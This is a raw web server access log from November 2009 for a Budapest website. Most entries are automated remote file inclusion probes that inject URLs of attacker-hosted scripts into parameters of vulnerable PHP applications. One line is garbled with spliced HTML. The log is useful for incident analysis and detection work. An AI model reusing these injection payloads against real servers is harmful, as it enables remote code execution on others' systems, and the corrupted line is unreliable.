195.13.191.76 - - [01/Nov/2009:00:51:40 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
195.13.191.76 - - [01/Nov/2009:00:51:53 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
77.222.40.234 - - [01/Nov/2009:00:52:14 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.40.234 - - [01/Nov/2009:00:52:14 -0700] "GET /logs/access_090501.log//admin/business_inc/saveserver.php?thisdir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.40.234 - - [01/Nov/2009:00:52:14 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.40.234 - - [01/Nov/2009:00:52:52 -0700] "GET /logs/access_090401.log//admin/business_inc/saveserver.php?thisdir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:00:54:02 -0700] "GET /logs/access.log%20//skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:00:54:03 -0700] "GET /skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:00:54:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
77.222.40.234 - - [01/Nov/2009:00:55:11 -0700] "GET /logs/access_090501.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.40.234 - - [01/Nov/2009:00:55:34 -0700] "GET /logs/access_090401.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:00:56:23 -0700] "GET /logs/access_090501.log//admin/business_inc/saveserver.php?thisdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:00:56:23 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:00:56:23 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:00:56:59 -0700] "GET /logs/access_090401.log//admin/business_inc/saveserver.php?thisdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:00:59:05 -0700] "GET /logs/access_090501.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
61.47.7.71 - - [01/Nov/2009:01:01:14 -0700] "GET /logs/access_090401.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.53 - - [01/Nov/2009:01:18:45 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.53 - - [01/Nov/2009:01:18:50 -0700] "GET /logs/access_090401.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.53 - - [01/Nov/2009:01:18:50 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt? HTTP/1.1" 200 3377 "-" "Mozilla/5.0" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:01:19:13 -0700] "GET /logs/access.log%20//skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:01:19:13 -0700] "GET /skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:01:19:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:19:36 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 3377 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:19:37 -0700] "GET /logs/access_090401.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:19:37 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.53 - - [01/Nov/2009:01:19:45 -0700] "GET /logs/access_090329.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.53 - - [01/Nov/2009:01:19:45 -0700] "GET /logs/access_090401.log/////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
98.129.217.53 - - [01/Nov/2009:01:20:05 -0700] "GET /logs/access_090329.log/////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:20:06 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:20:08 -0700] "GET /logs/access_090401.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:20:08 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 3377 "-" "Mozilla/5.0" "www.budapestcapital.com"
195.13.191.76 - - [01/Nov/2009:01:20:28 -0700] "GET //vwar/backup/errors.php?error=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:42 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:42 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:42 -0700] "GET /logs/access_090331.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:45 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:46 -0700] "GET /logs/access_090331.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:46 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:47 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:47 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:20:47 -0700] "GET /logs/access_090331.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:20:48 -0700] "GET /logs/access_090329.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
195.13.191.76 - - [01/Nov/2009:01:20:50 -0700] "GET /logs/access_090329.log%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22errors.php%22+domain%3Abudapestcapital.com'%3EMore%20pages%20from%20budapestcapital.com%3C/a%3E %3Cbr%3E%3Cbr%3E%3Cbr%20class='lb'%3E%3Ca%20class='res'%20href='http://www.jobnseek.com/'%3EHome%20-%20Mahara%3C/a%3E%3Cbr%3E%3Cspan%20class=s%3EMahara%20requires%20javascript%20to%20be%20enabled%20before%20you%20can%20log%20in%20%3Cb%3E...%3C/b%3E%201,%20true,%20true)%20at%20/home/monsterb/public_html%3Cwbr%3E/jobnseek.com/lib/%3Cb%3Eerrors%3Cwbr%3E.php%3C/b%3E:102%20%3Cb%3E...%3C/b%3E%3Cbr%3E%3C/span%3E%3Cspan%20class=ngrn%3Ewww.jobnseek.com%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22errors.php%22+domain%3Ajobnseek.com'%3EMore%20pages%20from%20jobnseek.com%3C/a%3E %3Cbr%diana_b99/us1:202.93.37.208.89.214.167 - - [01/Nov/2009:01:21:16 -0700] "GET /logs/access_090401.log/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:21:28 -0700] "GET /logs/access_090329.log/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:21:29 -0700] "GET /logs/access_090329.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:22:40 -0700] "GET /logs/access_090401.log/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:22:52 -0700] "GET /logs/access_090329.log/////?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:01:23:09 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.infocleaners.com//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:01:23:09 -0700] "GET /logs/access.log//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.infocleaners.com//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:01:23:09 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.infocleaners.com//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:01:23:52 -0700] "GET /logs/access_090331.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:01:23:52 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:01:23:52 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:01:24:02 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:01:24:02 -0700] "GET /logs/access_090331.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:01:24:02 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:01:24:20 -0700] "GET /logs/access_090329.log//index2.php?x=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:01:24:22 -0700] "GET /index2.php?x=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:01:24:24 -0700] "GET /logs//index2.php?x=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:26:52 -0700] "GET /logs/access_090331.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:26:53 -0700] "GET /logs/access_090331.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:27:02 -0700] "GET /logs/access_090331.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:01:28:00 -0700] "GET /logs/access.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:01:28:01 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:01:28:01 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:01:28:11 -0700] "GET /logs/access.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:01:28:11 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:01:28:11 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [01/Nov/2009:01:28:45 -0700] "GET /logs/access.log%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.infocleaners.com//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:29:53 -0700] "GET /logs/access.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:29:56 -0700] "GET /logs/access.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.108.177.238 - - [01/Nov/2009:01:30:01 -0700] "GET /logs/access.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:41:54 -0700] "GET /logs/access_090301.log//modules/xfsection/modify.php?dir_module=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:41:54 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:42:02 -0700] "GET /modules/xfsection/modify.php?dir_module=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:42:16 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:42:16 -0700] "GET /modules/xfsection/modify.php?dir_module=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:01:42:16 -0700] "GET /logs/access_090301.log//modules/xfsection/modify.php?dir_module=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [01/Nov/2009:01:44:32 -0700] "GET /logs/index1.php?=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [01/Nov/2009:01:44:32 -0700] "GET /index1.php?=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [01/Nov/2009:01:44:32 -0700] "GET /logs/access_090329.log%20%20/index1.php?=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:01:49:45 -0700] "GET /logs/access_090331.log/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:01:49:53 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:01:53:35 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:01:53:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:01:53:38 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:59:36 -0700] "GET /logs/access_090329.log%20%20/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:59:36 -0700] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:59:36 -0700] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:00:30 -0800] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:00:30 -0800] "GET /logs/access_090329.log%20%20/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:00:30 -0800] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:02:29 -0800] "GET /logs/access_090329.log%20%20/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:02:29 -0800] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.38.18.203 - - [01/Nov/2009:01:02:29 -0800] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [01/Nov/2009:01:03:00 -0800] "GET /logs/access_090329.log/index1.php?=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:01:16:20 -0800] "GET /logs/access_090329.log//index2.php?x=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:01:16:21 -0800] "GET /index2.php?x=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:01:16:21 -0800] "GET /logs//index2.php?x=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
208.80.193.38 - - [01/Nov/2009:01:19:11 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0(Compatible RogueCleanerEmbeddedWB- 14.58 from: http://bsalsa.com/ ; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.58 http://bsalsa.com/ EmbeddedWB- 14.58 from: http://bsalsa.com/ )" "budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:25:49 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:25:49 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:25:50 -0800] "GET /logs/access.log%20%20//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:26:26 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:26:26 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:01:26:26 -0800] "GET /logs/access.log%20%20//skin/happycast_category_lightblack/ask_password.php?dir=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
200.91.8.66 - - [01/Nov/2009:01:26:50 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.budapestcapital.com"
